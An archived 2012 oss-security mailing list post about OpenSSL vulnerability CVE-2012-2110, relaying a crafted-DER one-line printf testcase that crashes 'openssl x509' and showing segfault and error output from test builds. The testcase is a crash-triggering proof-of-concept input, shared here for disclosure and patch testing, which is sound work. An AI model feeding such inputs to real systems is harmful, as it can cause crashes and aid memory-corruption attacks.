Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sun, 22 Apr 2012 16:23:11 +0400
From: Solar Designer <>
Subject: Re: OpenSSL ASN1 BIO vulnerability (CVE-2012-2110)


On Fri, Apr 20, 2012 at 01:11:19PM +0400, Solar Designer wrote:
> Tavis Ormandy of Google Security Team found a vulnerability in OpenSSL:
> incorrect integer conversions in OpenSSL can result in memory corruption.
> Advisory from OpenSSL:

Tavis posted a followup to my message, where he attached a testcase that
was unfortunately above oss-security's message size limit - so the
message did not make it to the list.  I've gzip-compressed the file and
have re-attached it to this message now (it's only 3 KB when compressed).

Tavis' message was:

On Fri, Apr 20, 2012 at 09:20:39PM +0200, Tavis Ormandy wrote:
> FWIW, here is the testcase I sent to openssl-team.
> A smaller one that's easier to test is this:
> $ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
> Tavis.

FWIW, trying these two on OpenSSL 1.0.0d (the Owl package, which
includes some unrelated patches), I get:

x86_64 build:
$ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
Segmentation fault
$ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt
unable to load certificate
47191757631152:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319:
47191757631152:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509

i686 build:
$ printf "\xe3\x80\x81\x84\xe3\x80\x00\x00\x00\x00" | openssl x509 -inform DER
unable to load certificate
3082893472:error:0D07207B:asn1 encoding routines:ASN1_get_object:header too long:asn1_lib.c:150:
$ openssl x509 -inform DER < openssl-1.0.1-testcase-32bit.crt
unable to load certificate
3083593888:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag:tasn_dec.c:1319:
3083593888:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error:tasn_dec.c:381:Type=X509

So no luck triggering a crash on 32-bit, although we must patch the
issue on 32-bit as well.  I'm not sure if I am using the larger testcase
correctly, though.  I am not familiar with this.

The smaller testcase also triggers a segfault on OpenSSL 0.9.7m (with
unrelated patches) on x86_64.  So not surprisingly some versions older
than 0.9.8 are vulnerable as well.


Download attachment "openssl-1.0.1-testcase-32bit.crt.gz" of type "application/octet-stream" (2870 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ